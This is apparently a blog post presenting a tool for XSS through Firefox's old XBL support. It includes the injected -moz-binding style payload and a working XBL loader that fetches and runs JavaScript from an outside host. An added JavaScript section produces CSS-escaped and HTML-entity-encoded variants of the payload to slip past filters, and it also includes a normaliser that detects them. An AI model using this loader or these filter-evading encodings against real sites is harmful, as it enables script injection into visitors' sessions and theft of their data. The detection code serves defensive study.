Today I wrote a simple tool to illustrate loading a JavaScript file into a page through Firefox's XBL support (the -moz-binding CSS property) in an XSS context.
The process works as follows:
- Inject a style attribute carrying the binding into any element (different encodings may be necessary), for example: <element style="-moz-binding:url('http://site.com/STXSS_XBL.xml#loader');" />.
- The browser fetches the XBL document and attaches the binding whose id is given by the URL fragment (here "loader") to the element.
- The binding's constructor modifies the DOM to include <script src="evil_script.js"/>.
- The browser loads and parses the JavaScript.
Note that from Firefox 3 onward a binding is only applied when the XBL document is same-origin with the page (or is served with the appropriate Access-Control header), and XBL has since been removed from Firefox altogether, so the technique is limited to older releases.
The required XBL document (STXSS_XBL.xml) is as follows:
<?xml version="1.0"?>
<bindings xmlns="http://www.mozilla.org/xbl">
  <binding id="loader">
    <implementation>
      <!-- The constructor runs once the binding has been attached to the injected element -->
      <constructor>
        <![CDATA[
        //This is the STXSS XBL Loader
        //Edit this line to the URL of the STXSS JavaScript
        var url = "http://www.your-site.com/STXSS_JS.js";
        //Do not edit below this line
        //Inside the constructor, document is the page the binding was attached to
        var scr = document.createElement("script");
        scr.setAttribute("src", url);
        //Append to the root <html> element, which always exists, rather than relying on <body>
        var rootElement = document.getElementsByTagName("html").item(0);
        rootElement.appendChild(scr);
        ]]>
      </constructor>
    </implementation>
  </binding>
</bindings>
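Step 1 of the process above says different encodings may be necessary to get the style attribute past a filter. The following is an added example and is not part of the STXSS tool or the XBL document: it builds the plain payload, the CSS hex-escaped and HTML-entity-encoded variants of it, and, going beyond the post, a normaliser that a filter or detector can run over a style attribute so that those encodings (and CSS comments or whitespace) do not hide -moz-binding. The XBL URL is the placeholder from the post; the function names and the encoding and decoding routines are my own constructions.

```javascript
// Added example (not part of the STXSS tool): payload encodings for the injected
// style attribute, and a normaliser that lets a detector see through them.
// The XBL URL is the placeholder from the post; everything else is constructed here.

const XBL_URL = "http://site.com/STXSS_XBL.xml#loader";

// Plain payload exactly as in step 1 of the process.
function rawPayload(xblUrl) {
  return "-moz-binding:url('" + xblUrl + "');";
}

// CSS hex escapes: every character becomes \<hex><space>, e.g. "-" -> "\2d ".
// The CSS parser decodes these, so the property still applies.
function cssHexEscape(s) {
  return Array.from(s).map(ch => "\\" + ch.codePointAt(0).toString(16) + " ").join("");
}

// HTML decimal character references, decoded by the HTML parser before CSS sees them.
function htmlDecimalEntities(s) {
  return Array.from(s).map(ch => "&#" + ch.codePointAt(0) + ";").join("");
}

// --- detection side ---

// Undo numeric and the common named character references (HTML attribute layer).
function decodeHtmlEntities(s) {
  const named = { amp: "&", lt: "<", gt: ">", quot: "\"", apos: "'" };
  return s.replace(/&(#x[0-9a-f]+|#[0-9]+|[a-z]+);?/gi, (match, body) => {
    if (body[0] === "#") {
      const hex = body[1].toLowerCase() === "x";
      const cp = parseInt(hex ? body.slice(2) : body.slice(1), hex ? 16 : 10);
      return cp <= 0x10ffff ? String.fromCodePoint(cp) : match;
    }
    const key = body.toLowerCase();
    return named[key] !== undefined ? named[key] : match;
  });
}

// Undo CSS escapes (CSS layer): \<1-6 hex digits><optional whitespace> or \<any char>.
function decodeCssEscapes(s) {
  return s.replace(/\\([0-9a-f]{1,6})\s?|\\([^\n])/gi, (match, hex, ch) => {
    if (hex !== undefined) {
      const cp = parseInt(hex, 16);
      return cp <= 0x10ffff ? String.fromCodePoint(cp) : "";
    }
    return ch;
  });
}

// Decode in the order the browser does (HTML first, then CSS), then strip CSS
// comments and whitespace and lowercase so the match is robust to obfuscation.
function normalizeStyle(style) {
  return decodeCssEscapes(decodeHtmlEntities(style))
    .replace(/\/\*[\s\S]*?\*\//g, "")
    .replace(/\s+/g, "")
    .toLowerCase();
}

function containsMozBinding(style) {
  return /-moz-binding:url\(/.test(normalizeStyle(style));
}

// Stand-alone demo over constructed attribute values.
const variants = {
  raw: rawPayload(XBL_URL),
  cssEscaped: cssHexEscape(rawPayload(XBL_URL)),
  htmlEntities: htmlDecimalEntities(rawPayload(XBL_URL)),
  commented: "-moz-binding/**/:\turl(" + XBL_URL + ")",
  benign: "color: red; background: url('http://site.com/logo.png')",
};
for (const [name, style] of Object.entries(variants)) {
  console.log(name.padEnd(13), containsMozBinding(style) ? "FLAGGED" : "clean");
}
```

The decoding order matters: the HTML parser resolves character references when it builds the attribute value, and only then does the CSS parser resolve backslash escapes, so a filter that decodes in the opposite order, or only one layer, can be bypassed by stacking the two encodings.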